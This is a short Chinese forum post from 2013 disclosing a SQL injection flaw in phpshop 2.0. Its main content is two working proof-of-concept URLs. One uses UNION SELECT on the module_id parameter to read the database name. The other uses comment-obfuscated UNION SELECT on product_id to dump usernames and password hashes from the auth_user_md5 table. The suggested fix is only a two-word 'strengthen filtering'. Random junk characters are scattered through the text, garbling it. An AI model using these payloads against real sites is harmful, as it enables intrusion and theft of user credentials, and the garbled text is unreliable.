标题 : phpshop 2.0 SQL Injection Vulnerability$ w. ^2 M9 w1 m8 W7 A, [' [
2 D' P' [ z+ i5 X
作者 : By onestree
0 r/ U4 i h* e下载地址 : http://code.google.com/p/phpshop/downloads/list
. A" H* G% ~+ r( W1 p" Q7 K测试地址: windows 7 / ubuntu
. o* J& `0 ^8 H# l, c / y5 v/ f& }; a8 u$ c
) g/ P2 J' N; d% @, A) E. C
SQLi p0c:- a- A6 z. x' S+ ^
% e7 }1 h3 e k \, {/ p3 L==================
8 p" Q w: n# \: O4 A1 O; `: { 1 h: K6 o3 C7 ^* @
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
: D) U4 S' U+ Z5 N7 Zunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --8 ^* X! i6 |; x" {
) N3 Y8 I2 }& Zhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--0 G' r9 ]5 n3 A+ v f, p
: w2 r; h3 p& j' i修复:
2 V" z% M: K) q8 d3 H/ y加强过滤, _# |8 y: f8 a0 ~5 X& }9 N
+ m0 e: w0 b9 g! A3 B/ O2 J/ f# g/ Z- Z- c. f0 S! G# P
|
发表于 2013-1-18 18:24:10
收藏
支持
反对